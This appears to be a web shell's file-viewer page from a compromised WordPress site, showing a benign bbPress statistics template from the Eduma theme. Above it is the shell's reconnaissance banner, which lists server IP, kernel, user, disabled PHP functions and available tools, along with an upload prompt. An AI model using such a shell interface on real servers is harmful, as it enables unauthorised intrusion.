| Server IP : 104.21.28.229 / Your IP : 216.73.216.142 Web Server : Apache/2 System : Linux hosting8537.lvs 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : mienphi ( 1014) PHP Version : 8.2.14 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/mienphi/public_html/wp-content/themes/eduma_OLD/bbpress/ |
Upload File : |
<?php /** * Statistics Content Part * * @package bbPress * @subpackage Theme */ // Get the statistics $stats = bbp_get_statistics(); ?> <dl role="main"> <?php do_action( 'bbp_before_statistics' ); ?> <dt><?php esc_html_e( 'Registered Users', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['user_count'] ); ?></strong> </dd> <dt><?php esc_html_e( 'Forums', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['forum_count'] ); ?></strong> </dd> <dt><?php esc_html_e( 'Topics', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['topic_count'] ); ?></strong> </dd> <dt><?php esc_html_e( 'Replies', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['reply_count'] ); ?></strong> </dd> <dt><?php esc_html_e( 'Topic Tags', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['topic_tag_count'] ); ?></strong> </dd> <?php if ( !empty( $stats['empty_topic_tag_count'] ) ) : ?> <dt><?php esc_html_e( 'Empty Topic Tags', 'eduma' ); ?></dt> <dd> <strong><?php echo esc_html( $stats['empty_topic_tag_count'] ); ?></strong> </dd> <?php endif; ?> <?php if ( !empty( $stats['topic_count_hidden'] ) ) : ?> <dt><?php esc_html_e( 'Hidden Topics', 'eduma' ); ?></dt> <dd> <strong> <abbr title="<?php echo esc_attr( $stats['hidden_topic_title'] ); ?>"><?php echo esc_html( $stats['topic_count_hidden'] ); ?></abbr> </strong> </dd> <?php endif; ?> <?php if ( !empty( $stats['reply_count_hidden'] ) ) : ?> <dt><?php esc_html_e( 'Hidden Replies', 'eduma' ); ?></dt> <dd> <strong> <abbr title="<?php echo esc_attr( $stats['hidden_reply_title'] ); ?>"><?php echo esc_html( $stats['reply_count_hidden'] ); ?></abbr> </strong> </dd> <?php endif; ?> <?php do_action( 'bbp_after_statistics' ); ?> </dl> <?php unset( $stats );